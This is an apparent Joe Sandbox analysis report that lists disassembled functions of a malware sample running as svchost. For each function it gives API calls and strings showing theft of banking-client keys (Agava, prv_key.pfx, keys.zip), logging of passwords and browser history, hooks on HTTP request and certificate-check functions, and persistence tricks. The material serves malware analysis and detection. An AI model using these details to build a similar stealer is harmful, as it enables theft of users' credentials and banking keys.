Instruction Fuzzy Hash: 50B12832A443466BDB228A24DC6DBBB7BE5EF85704F144518FDC59B380DB71AD09C7A0

Function 02D3E630 Relevance: 52.7, APIs: 26, Strings: 4, Instructions: 220memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D3E64E
PathAddBackslashA.SHLWAPI(5e8dc1e5), ref: 02D3E67A
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E6BD
GetLastError.KERNEL32 ref: 02D3E6C3
IsUserAnAdmin.SHELL32 ref: 02D3E6CB
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E6DC
SetLastError.KERNEL32(00000000), ref: 02D3E6E3
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D3E71B
DeleteFileA.KERNEL32(?), ref: 02D3E728
PathAddBackslashA.SHLWAPI(5e8dc1e5,?,?), ref: 02D3E767
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02D3E7A5
GetLastError.KERNEL32 ref: 02D3E7AC
IsUserAnAdmin.SHELL32 ref: 02D3E7B4
PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02D3E7C5
SetLastError.KERNEL32(00000000), ref: 02D3E7CC
GetFileAttributesA.KERNEL32(?), ref: 02D3E806
SetCurrentDirectoryA.KERNEL32(?), ref: 02D3E831
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02D3E855
Sleep.KERNEL32(000003E8), ref: 02D3E866
ReleaseMutex.KERNEL32(00000000), ref: 02D3E86D
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3E87F
CloseHandle.KERNEL32(00000000), ref: 02D3E890
GetProcessHeap.KERNEL32(00000000,?), ref: 02D3E89F
HeapValidate.KERNEL32(00000000), ref: 02D3E8A2
GetProcessHeap.KERNEL32(00000000,?), ref: 02D3E8AF
HeapFree.KERNEL32(00000000), ref: 02D3E8B2

Strings

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}, xrefs: 02D3E84C
keys.zip, xrefs: 02D3E7E8
5e8dc1e5, xrefs: 02D3E675, 02D3E680, 02D3E762, 02D3E76D
path.txt, xrefs: 02D3E6F8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
String ID: 5e8dc1e5$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$keys.zip$path.txt
API String ID: 1472338570-2927371403
Opcode ID: 39c516a9f23e585f1b52e90cea1156be74716142750e50589a5d56d935702312
Instruction ID: 2df0fe71f687b005e3dce086632dba6fa2523cfe51f6e5eb2c91fab54a52de63
Opcode Fuzzy Hash: 39c516a9f23e585f1b52e90cea1156be74716142750e50589a5d56d935702312
Instruction Fuzzy Hash: D171F270D403559FDB228B34E86CBEA7FA8AF85701F588994E985D7381DB70DD84CBA0

Function 02D2A8A0 Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

open, xrefs: 02D2AA8C
taskmgr, xrefs: 02D2AA87

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: open$taskmgr
API String ID: 0-1543563666
Opcode ID: 89b96e7f90ebd62047a37a4cda1975f525c13cf6610d593eb3800a1cc4724a68
Instruction ID: d32eeda125f058160be75b8cc82cb7f94b728b1d88e3b34892b6009c86ddb7bb
Opcode Fuzzy Hash: 89b96e7f90ebd62047a37a4cda1975f525c13cf6610d593eb3800a1cc4724a68
Instruction Fuzzy Hash: 1F910836A80214EFC714DF68F88CEAA7778EB59319F504555F945A7380C7319C58CBB0

Function 02D25AE0 Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 272filememoryCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(?,?,00000000,75B0A250), ref: 02D25B11
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D25B4D
DeleteFileA.KERNEL32(?), ref: 02D25B5A
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D25B79
SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?), ref: 02D25B99
GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 02D25C20
HeapValidate.KERNEL32(00000000), ref: 02D25C23
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D25C30
HeapFree.KERNEL32(00000000), ref: 02D25C33
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02D25C48
GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 02D25CD2
HeapValidate.KERNEL32(00000000), ref: 02D25CD5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D25CE2
HeapFree.KERNEL32(00000000), ref: 02D25CE5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25D32
LockFile.KERNEL32(00000000,00000000,00000000,02D33674,00000000), ref: 02D25D41
WriteFile.KERNEL32(00000000,02D3365B,02D33674,00000000,00000000), ref: 02D25D56
UnlockFile.KERNEL32(00000000,00000000,00000000,02D33674,00000000), ref: 02D25D63
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25D7A
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25D8A
WriteFile.KERNEL32(00000000,02D65CF4,00000002,00000000,00000000), ref: 02D25D9E
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25DAC
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D25DD2
CloseHandle.KERNEL32(00000000), ref: 02D25DE3

Strings

links.log, xrefs: 02D25B28
\History.IE5\index.dat, xrefs: 02D25BBD
\Opera\Opera\typed_history.xml, xrefs: 02D25C6D
http, xrefs: 02D25BF0
http, xrefs: 02D25CA0

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$Heap$Process$Path$FolderFreeHandleLockPointerUnlockValidateWrite$AttributesBackslashCloseCreateDeleteInformation
String ID: \History.IE5\index.dat$\Opera\Opera\typed_history.xml$http$http$links.log
API String ID: 2678947633-2852051092
Opcode ID: 95ad512653328ce0643a55bf843a9868be77e14329fb297558ac2783473edc8f
Instruction ID: 110862b234437d7b01191eea63d69bc530798447a9f9790014a9fa9cbdad6510
Opcode Fuzzy Hash: 95ad512653328ce0643a55bf843a9868be77e14329fb297558ac2783473edc8f
Instruction Fuzzy Hash: B591E771940315BBDB248B60AC4DFEB7BB9EF54708F908544F645AB380DB70AD49CBA0

Function 004028B0 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(00401F70,?,0000001C,7604DB30,00000000,00000000), ref: 004028EB
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402903
PathFileExistsA.SHLWAPI(?), ref: 00402924
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040293C
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040297D
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040298D
GetCurrentProcess.KERNEL32(?), ref: 0040299E
GetTickCount.KERNEL32 ref: 004029D6

Part of subcall function 00401600: GetTickCount.KERNEL32 ref: 0040160B
Part of subcall function 00401600: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
Part of subcall function 00401600: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C

Part of subcall function 00401920: GetTickCount.KERNEL32 ref: 0040194A
Part of subcall function 00401920: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
Part of subcall function 00401920: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963

_snprintf.MSVCRT ref: 00402A50
CopyFileA.KERNEL32(?,?,00000001), ref: 00402A68
RtlImageNtHeader.NTDLL(00000000), ref: 00402A9A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AC5
HeapValidate.KERNEL32(00000000), ref: 00402AC8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AD4
HeapFree.KERNEL32(00000000), ref: 00402AD7
MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402AF6
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B05
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B15
GetCurrentProcess.KERNEL32(?), ref: 00402B26
GlobalFindAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B44
ExitProcess.KERNEL32 ref: 00402B55
GlobalAddAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B60

Strings

%s_, xrefs: 00402A3E
svchost.exe, xrefs: 004029BA
.exe, xrefs: 00402A28
IsWow64Process, xrefs: 00402987, 00402B0F
Tue Aug 2 12:53:17 20111, xrefs: 00402B3F, 00402B5B
\apppatch\, xrefs: 0040294F
kernel32.dll, xrefs: 00402971, 00402AFC

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
String ID: %s_$.exe$IsWow64Process$Tue Aug 2 12:53:17 20111$\apppatch\$kernel32.dll$svchost.exe
API String ID: 4049655197-1703505012
Opcode ID: 316ab541766f69de20ede4138c7f30c1feb611c6e1e8b9ea983fb4f01bd77043
Instruction ID: 7f5ae7708a7b69610b0b59458e4d7764c7ebe7900fbd9078b2849b4018493b30
Opcode Fuzzy Hash: 316ab541766f69de20ede4138c7f30c1feb611c6e1e8b9ea983fb4f01bd77043
Instruction Fuzzy Hash: 6A715EB16043419FC710EF60DE889AB7BE8BB98300F44493EF785B72A1D7789904CB99

Function 02D37E00 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 391fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D37F62
malloc.MSVCRT ref: 02D37FC3
sprintf.MSVCRT ref: 02D37FD2
calloc.MSVCRT ref: 02D37FDC
fopen.MSVCRT ref: 02D37FE9
sprintf.MSVCRT ref: 02D37FFF
fopen.MSVCRT ref: 02D3800A
free.MSVCRT(00000000), ref: 02D3801C
free.MSVCRT(00000000), ref: 02D3801F
free.MSVCRT(00000000), ref: 02D3802B
malloc.MSVCRT ref: 02D38051
fread.MSVCRT ref: 02D3805F
fclose.MSVCRT ref: 02D3806E
free.MSVCRT(00000000), ref: 02D3807B
free.MSVCRT(00000000), ref: 02D3807E
malloc.MSVCRT ref: 02D380E1
realloc.MSVCRT ref: 02D380EC
fseek.MSVCRT ref: 02D38101
fread.MSVCRT ref: 02D38111
fclose.MSVCRT ref: 02D38122
malloc.MSVCRT ref: 02D3813E
malloc.MSVCRT ref: 02D38147
malloc.MSVCRT ref: 02D38150
malloc.MSVCRT ref: 02D3815C

Strings

rb+, xrefs: 02D37EAE, 02D37F49
%s.dbf, xrefs: 02D37FCC
r+b, xrefs: 02D37EDE
%s.DBF, xrefs: 02D37FF9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
String ID: %s.DBF$%s.dbf$r+b$rb+
API String ID: 3942648141-1626032180
Opcode ID: 628c7eed72409471dbaf0f2bc64e93c028193eafceed562fac537113bb60812b
Instruction ID: 7ee748bf390413063978ab34eb45568cfd1a97028cf4c09b1f8ff2ea9b654c02
Opcode Fuzzy Hash: 628c7eed72409471dbaf0f2bc64e93c028193eafceed562fac537113bb60812b
Instruction Fuzzy Hash: E9D128F1A046415BE7224F38DC987B6BBF6BF46214B5846A8E8D5CB381E732DD09C760

Function 004034E9 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040351B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 00403567
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040356E
memset.MSVCRT ref: 00403586
_snwprintf.MSVCRT ref: 004035A0
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403643
wcsstr.MSVCRT ref: 00403662
wcsstr.MSVCRT ref: 00403695
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040372B
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040375C
SetEndOfFile.KERNEL32(00000000), ref: 00403763
CloseHandle.KERNEL32(00000000), ref: 0040376A
VariantInit.OLEAUT32(00000000), ref: 0040379B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F7
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037FA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403807
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040380A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040381D
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403820
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040382D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403830

Strings

<Actions , xrefs: 0040365A
p=<u, xrefs: 0040379B
00-->, xrefs: 0040368F

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
String ID: 00-->$<Actions $p=<u
API String ID: 3028510665-3770785300
Opcode ID: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
Instruction ID: 013638ac99e31dc1b3f0b1cbc1bcbf050739cfec6944e8e6b412d7e6261d8edc
Opcode Fuzzy Hash: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
Instruction Fuzzy Hash: 32A1C0B1500311ABC720DF64CC49F5B7BA8EFC8751F048A69FA49A7391D774EA04CBA4

Function 02D3AFC0 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 214fileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc0d9), ref: 02D3B008
CreateDirectoryA.KERNEL32(02D7DEC0,00000000), ref: 02D3B048
GetLastError.KERNEL32 ref: 02D3B04E
IsUserAnAdmin.SHELL32 ref: 02D3B056
PathMakeSystemFolderA.SHLWAPI(02D7DEC0), ref: 02D3B065
SetLastError.KERNEL32(00000000), ref: 02D3B06C
SetFileAttributesA.KERNEL32(02D7DEC0,00000000), ref: 02D3B0A1
DeleteFileA.KERNEL32(02D7DEC0), ref: 02D3B0AC
PathAddBackslashA.SHLWAPI(5e8dc0d9,00000000,00000001), ref: 02D3B0F6

Strings

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02D3B1CD
5e8dc0d9, xrefs: 02D3B003, 02D3B00E, 02D3B0F1, 02D3B0FC
path.txt, xrefs: 02D3B080

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
String ID: 5e8dc0d9$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$path.txt
API String ID: 2920098687-4171141325
Opcode ID: e08e7cf121ce251eeaa95f6ce1a00066ba760404faf951400842a6b375769259
Instruction ID: 7803deae40c3f5f541fc04a8be78601f79323436095497636213a3f41bae7af3
Opcode Fuzzy Hash: e08e7cf121ce251eeaa95f6ce1a00066ba760404faf951400842a6b375769259
Instruction Fuzzy Hash: 2F611531A40655AFEB124B34F86DBAA3BD6EF4A745F588542EC86CB340EB74CD44C7A0

Function 02D431A0 Relevance: 47.5, APIs: 17, Strings: 10, Instructions: 273stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02D44800: memset.MSVCRT ref: 02D44824
Part of subcall function 02D44800: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D4482F

OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 02D431C6
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D431E5
GetHandleInformation.KERNEL32(00000000,?), ref: 02D431F7
CloseHandle.KERNEL32(00000000), ref: 02D43208
GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 02D43250
strstr.MSVCRT ref: 02D43264
GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 02D432A4
strstr.MSVCRT ref: 02D432B2
strstr.MSVCRT ref: 02D432C7
SetCurrentDirectoryA.KERNEL32(?), ref: 02D43364
PathAddBackslashA.SHLWAPI(02D7CF94), ref: 02D4339D

Strings

Agava_Client.exe, xrefs: 02D431AC
Agava_keys, xrefs: 02D43338
keys.zip, xrefs: 02D433E8
Agava_Client.ini, xrefs: 02D432C1
keys_path.txt, xrefs: 02D43478
.ini, xrefs: 02D43232
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D434DE
Containers, xrefs: 02D4324B, 02D4329F
UseToken, xrefs: 02D43246
KeysDiskPath, xrefs: 02D4329A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
String ID: .ini$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$UseToken$keys.zip$keys_path.txt
API String ID: 2651364649-3373206754
Opcode ID: a043a30e8f5ed42554b92a87c36f850382964644dc28085f414e7e5e4952f5b3
Instruction ID: 3dca57d76b63df3ccbcb8dee0102893dd85f9def8f941ec00edb6084af021090
Opcode Fuzzy Hash: a043a30e8f5ed42554b92a87c36f850382964644dc28085f414e7e5e4952f5b3
Instruction Fuzzy Hash: F4A1F5309402595FDB16CB28A898BEA7BE5EF45304F6445D4E985D7340EF709E89CBE0

Function 02D30EF0 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 137libraryloadermemoryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,74DEF550,00000000), ref: 02D30F0E
GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02D30F24
VirtualProtect.KERNEL32(00000000,00000006,00000040,?,74DF1620), ref: 02D30F3C
VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02D30F5E
LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02D30F6A
GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02D30F80
GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02D30F9C
GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02D30FB8
GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02D30FD4
GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02D30FF0
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02D3100C
GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02D31028
GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02D31044
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02D31060

Strings

CertVerifyCertificateChainPolicy, xrefs: 02D30F1E
InternetQueryDataAvailable, xrefs: 02D30FEA
HttpSendRequestExA, xrefs: 02D30FB2
HttpSendRequestExW, xrefs: 02D30FCE
InternetReadFileExA, xrefs: 02D31022
HttpSendRequestW, xrefs: 02D30F96
Crypt32.dll, xrefs: 02D30EFC
InternetReadFile, xrefs: 02D31006
HttpSendRequestA, xrefs: 02D30F7A
InternetReadFileExW, xrefs: 02D3103E
InternetCloseHandle, xrefs: 02D3105A
Wininet.dll, xrefs: 02D30F65

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadProtectVirtual
String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
API String ID: 1705253364-835984666
Opcode ID: bec7ad07b1768b2c355feb339a0cbc9c4ac169805091d214cc2d1f375092d77b
Instruction ID: cc4cb8733bab085454f2a48d14c8e5c48c77993f2f2263d0eb39ecc94f761ab0
Opcode Fuzzy Hash: bec7ad07b1768b2c355feb339a0cbc9c4ac169805091d214cc2d1f375092d77b
Instruction Fuzzy Hash: 43314E71B8171B76FA227A65FD1AFAB135C9F04E85F240110B902B2784DBB9ED09C978

Function 02D3EB30 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02D3EB5D
PathAddBackslashA.SHLWAPI(5E8DC1A1), ref: 02D3EB9E
PathAddBackslashA.SHLWAPI(5E8DC1A1), ref: 02D3EBD2
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3EBE7
GetLastError.KERNEL32 ref: 02D3EBF1
IsUserAnAdmin.SHELL32 ref: 02D3EBF9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3EC0A
SetLastError.KERNEL32(00000000), ref: 02D3EC11
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D3EC4B
DeleteFileA.KERNEL32(?), ref: 02D3EC58
PathAddBackslashA.SHLWAPI(5E8DC1A1,02D6FDB8,02D6FDB9), ref: 02D3EC99
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3ECD4
GetLastError.KERNEL32 ref: 02D3ECDE
IsUserAnAdmin.SHELL32 ref: 02D3ECE6
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3ECF7
SetLastError.KERNEL32(00000000), ref: 02D3ECFE
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D3ED3B
DeleteFileA.KERNEL32(?), ref: 02D3ED48
CreateThread.KERNEL32(00000000,00000000,02D3EF40,02D6FDB8,00000000,00000000), ref: 02D3ED7E
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3ED96
CloseHandle.KERNEL32(00000000), ref: 02D3EDA7

Strings

prv_key.pfx, xrefs: 02D3EB57
5E8DC1A1, xrefs: 02D3EB99, 02D3EBA0, 02D3EBCB, 02D3EBD4, 02D3EC94, 02D3EC9B
pass.log, xrefs: 02D3ED18
path.txt, xrefs: 02D3EC28

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
String ID: 5E8DC1A1$pass.log$path.txt$prv_key.pfx
API String ID: 448721894-3200690458
Opcode ID: 082ce2d62c0c879427fd24d676255c2f970f67d9e09e9348d015e7b466f7abef
Instruction ID: 5cc335664ca942f49e3dc8855f580d32a7680006b9bb6c1f89396d1c6122f9d7
Opcode Fuzzy Hash: 082ce2d62c0c879427fd24d676255c2f970f67d9e09e9348d015e7b466f7abef
Instruction Fuzzy Hash: A3710531A402159FDB129F28E86CBEA7BE5EF45700F548990E986C7380DB70DD84CBA0

Function 02D3E2FC Relevance: 42.3, APIs: 17, Strings: 7, Instructions: 259fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?), ref: 02D3E308
StrStrIA.SHLWAPI(?,found.), ref: 02D3E323
StrStrIA.SHLWAPI(?,asus), ref: 02D3E33E
PathAddBackslashA.SHLWAPI(5E8DC03F), ref: 02D3E364
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E39E
GetLastError.KERNEL32 ref: 02D3E3A8
IsUserAnAdmin.SHELL32 ref: 02D3E3B0
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E3BF
SetLastError.KERNEL32(00000000), ref: 02D3E3C6
PathAddBackslashA.SHLWAPI(5E8DC03F,?,?), ref: 02D3E469
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E4A3
GetLastError.KERNEL32 ref: 02D3E4AD
IsUserAnAdmin.SHELL32 ref: 02D3E4B5
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E4C4
SetLastError.KERNEL32(00000000), ref: 02D3E4CB
FindNextFileA.KERNEL32(?,?), ref: 02D3E5BF
SetErrorMode.KERNEL32(?), ref: 02D3E5F3

Strings

keys, xrefs: 02D3E3D9
path, xrefs: 02D3E4DE
.zip, xrefs: 02D3E428
asus, xrefs: 02D3E331
5E8DC03F, xrefs: 02D3E35F, 02D3E36A, 02D3E464, 02D3E46F
.txt, xrefs: 02D3E528
found., xrefs: 02D3E316

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
